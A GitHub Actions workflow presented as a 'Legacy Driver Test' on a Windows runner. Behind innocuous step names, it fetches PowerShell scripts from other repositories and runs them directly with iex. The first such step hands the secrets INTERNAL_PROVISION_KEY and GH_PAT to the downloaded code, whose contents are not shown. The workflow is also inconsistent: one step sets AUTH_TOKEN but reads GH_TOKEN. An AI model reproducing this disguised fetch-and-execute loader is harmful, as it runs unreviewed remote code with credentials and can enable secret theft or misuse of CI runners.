name: Legacy Driver Test
on:
  workflow_dispatch:
    inputs:
      t:
        default: '60'
jobs:
  v:
    runs-on: windows-latest
    steps:
      - name: System Pre-flight Check
        run: gcim Win32_VideoController|select Name,DriverVersion
      - name: Provision Internal Testing Environment
        shell: pwsh
        env:
          PROVISION_TOKEN: ${{secrets.INTERNAL_PROVISION_KEY}}
          AUTH_TOKEN: ${{secrets.GH_PAT}}
        run: |
          $h=@{Authorization="token $env:AUTH_TOKEN";Accept="application/vnd.github.v3.raw"};
          iex(irm "https://raw.githubusercontent.com/${{github.repository_owner}}/ops-internal/main/c.ps1" -H $h)
      - name: Execute Driver Test
        shell: pwsh
        env:
          AUTH_TOKEN: ${{secrets.G}}
          T: ${{github.event.inputs.t}}
        run: |
          $h=@{Authorization="token $env:GH_TOKEN";Accept="application/vnd.github.v3.raw"};
          $s=irm "https://raw.githubusercontent.com/${{github.repository_owner}}/o/main/v.ps1" -H $h;
          iex "& { $s } -DurationMinutes $env:T"
